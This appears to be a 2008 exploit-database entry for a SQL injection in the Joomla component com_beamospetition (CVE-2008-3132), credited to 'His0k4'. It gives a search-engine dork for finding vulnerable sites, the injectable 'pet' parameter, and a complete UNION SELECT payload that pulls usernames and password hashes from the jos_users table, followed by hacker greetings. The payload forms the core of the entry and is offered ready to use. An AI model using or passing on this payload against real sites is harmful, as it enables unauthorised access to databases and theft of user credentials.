[] NeoSense

Joomla! Component beamospetition - SQL Injection

Author: His0k4
type: webapps
platform: php
port: 
date_added: 2008-06-27 
date_updated:  
verified: 1 
codes: OSVDB-47051;CVE-2008-3132 
tags: 
aliases:  
screenshot_url:  
application_url: 

/---------------------------------------------------------------\
\                                				/
/     Joomla Component beamospetition Remote SQL injection      \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_beamospetition

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://www.dz-secure.com
                 http://palcastle.org/cc

# milw0rm.com [2008-06-28]